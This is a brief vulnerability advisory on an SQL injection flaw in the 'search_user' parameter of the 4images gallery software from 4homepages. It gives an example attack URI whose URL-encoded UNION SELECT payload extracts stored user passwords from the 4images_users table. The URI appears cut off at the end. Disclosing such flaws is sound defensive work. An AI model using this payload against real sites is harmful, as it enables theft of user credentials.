4homepages 4images 'search_user' Parameter SQL Injection Vulnerability

4homepages 4images 'search_user' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available.

http://www.example.com/path/search.php?search_user=x%2527%20union%20select%20user_password%20from%204images_users%20where%2$